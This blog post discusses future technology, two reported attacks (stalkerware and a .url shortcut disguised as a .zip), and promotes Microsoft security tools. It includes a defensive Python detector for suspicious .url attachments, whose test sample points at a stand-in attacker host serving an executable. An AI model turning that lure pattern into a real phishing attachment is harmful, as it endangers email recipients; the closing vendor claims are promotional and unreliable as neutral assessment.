Futuristic Attack Vectors

We had a really interesting discussion in the office yesterday about trying to understand the future through the lens of today’s technology.

A few years ago I would have railed against the idea of not being in control of a car, but I think it’s approaching criticality to remove the distracted driver from the equation. And certainly the technology is very nearly there for mass-scale adoption of driverless technology. (Consider, for a moment, selling the concept of today’s road system to an insurance underwriter with no knowledge of cars: “we’re going to let minimally-trained operators pilot 4000 lb steel cocoons at up to 70mph. Those operators will have full control and the vehicles will require constant maintenance, but don’t worry: they’ll be separated by lines of paint.”)

The biggest impediment to driverless is likely not the occasional accident, but the combination of old cars and luddite drivers. But flying cars? Now that’s another thing, and one where I think the futurists may still be a bit off-base.

Have you seen the Moller Skycar or any of its…competitors…in that “market”? We’ve had single- and dual-passenger planes for generations that are frankly more efficient than anything in the current “flying car” space, and I don’t see that changing for a long time. While flight-control systems can be automated easily enough, the range problem always comes back, as does the parking issue with necessarily-larger vehicles. Go ahead: change my mind. Show me a propulsion technology that doesn’t significantly contribute to mass (and therefore an exponential uptick in required fuel…and its associated mass) that can be mass-produced in a small-enough package to fit in a parking space.

In the meantime, I’ll muse on how that parallels with computer technology. Remember when quantum was “just a few years away” and was going to fundamentally change everything about computing? “I was promised quantum computers.” Go!

But while predicting some elements of future computing is extremely difficult, we do know that attacks on computing will continue, and attackers will constantly evolve and adapt their methodologies to system capabilities and protections.

A couple of new attack vectors hit the news this week, and both of them instantly shot me into the whole “tech futurist” mindset. The first one, while awful in its import, was elegant in its simplicity: re-use ancient code from known attacks of the ’90s, but target a small-enough set of users to not trigger “big data” sensors.

An attacker in Ohio distributed monitoring software that collected illicit webcam pics, web history, and even keystrokes from unsuspecting users. He’s going to prison, but was able to operate for months, if not years, by being very careful to not release his attacks into the mainstream.

The power of the cloud comes in its ability to use aggregate data to make intelligent decisions. This attack was largely ignored by traditional antivirus applications, even though it was using known malicious code. It’s speculation, but my guess is because that code was so old, it wasn’t being actively detected.

Funny story, though: have you heard of the “Bad Rabbit” attack from a while back? It was Russian malware that Windows Defender stopped cold within the first 15 detections. So even running the attack at a very small and targeted scale, with the right tools in place (and using the power of the world’s largest security sensor array), this guy could have gone from operating undetected for years to a much faster conviction.

The other attack that’s been making the rounds is also rather elegant in its simplicity: masquerading a URL-based folder as a .zip file, making Windows’ File Explorer browse files on a remote (malicious) server as though they were contained within a local trusted archive. From what I’ve seen, they’re mostly appearing as “you have voice mail” kinds of messages, but the intent is to get the user to execute a remote file directly in Windows—not even in the web browser.

What’s interesting here is that because the attachment has a URL extension, it’s incredibly easy to slip past email filters. And since the attacker owns the URL, even traditional methods that would check the destination at the time of delivery can be duped into believing that the destination is safe.
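A mail-gateway style check for the lure described above, added here as an example and not code from the original post: it parses a Windows Internet Shortcut (.url) attachment and flags a target that is a remote file share with a “.zip”-named folder in the path. It assumes the documented .url layout (INI text with an `[InternetShortcut]` section and a `URL=` key); the sample attachments and the host `files.attacker.example` are constructed.

```python
# Added example, not from the original post. Assumes the documented .url
# layout: INI text with an [InternetShortcut] section and a URL= key.
import configparser
from urllib.parse import unquote, urlparse

REMOTE_FILE_SCHEMES = {"file", "smb"}
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}
EXEC_EXTS = (".exe", ".scr", ".js", ".vbs", ".hta", ".lnk", ".bat", ".cmd")


def shortcut_target(text):
    """Return the URL= value of a .url file, or None if it cannot be parsed."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def assess_target(url):
    """List the reasons a shortcut target looks like the remote-zip lure."""
    reasons = []
    if url.startswith("\\\\"):            # bare UNC path: \\host\share\...
        url = "file:" + url.replace("\\", "/")
        reasons.append("target written as a UNC path")
    p = urlparse(url)
    scheme = p.scheme.lower()
    segments = [unquote(s).lower() for s in p.path.split("/") if s]
    if scheme in REMOTE_FILE_SCHEMES and p.netloc.lower() not in LOCAL_HOSTS:
        reasons.append(f"{scheme}: target on remote host {p.netloc}")
    if any(s.endswith(".zip") for s in segments[:-1]):  # .zip used as a folder
        reasons.append("'.zip' used as a folder name in the path")
    if segments and segments[-1].endswith(EXEC_EXTS):
        reasons.append(f"target is an executable: {segments[-1]}")
    return reasons


def scan_attachment(filename, text):
    """Return (verdict, reasons) for one attachment; non-.url files are ignored."""
    if not filename.lower().endswith(".url"):
        return "ignored", []
    target = shortcut_target(text)
    if target is None:
        return "quarantine", ["unparseable .url file"]
    reasons = assess_target(target)
    return ("quarantine" if reasons else "allow"), reasons


# Constructed samples: a voicemail-themed lure and an ordinary web shortcut.
LURE = "[InternetShortcut]\r\nURL=file://files.attacker.example/voicemail.zip/Voicemail_1.exe\r\n"
BENIGN = "[InternetShortcut]\r\nURL=https://www.example.com/report.pdf\r\n"
```

Because the check inspects the shortcut's own contents rather than resolving the destination, it is not fooled by a server that answers benignly at delivery time and switches content later.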

Cue a conversation around Office 365 Advanced Threat Detection, with time-of-click safe-link and safe-attachment detection, and it’s exceptionally unlikely that a user would be compromised within your environment.

But my point is not to sell you a specific tool for a specific attack. What I find fascinating in both of these attacks is that, while they’re using simple (and yet sophisticated) adaptations to account for an ever-evolving security landscape, they can be easily disrupted because somebody somewhere at Microsoft decided to take all the world’s Windows, Xbox, server, Azure, O365, and other telemetry to build an intelligent Security Graph that learns, adapts, and protects on the fly.

With the power of the Microsoft Graph backing my security solutions, I don’t have to be a security futurist. I can get back to important arguments about the range issue on flying cars and know that my corporate assets will receive best-in-class protections against both known and heretofore-unknown attack vectors.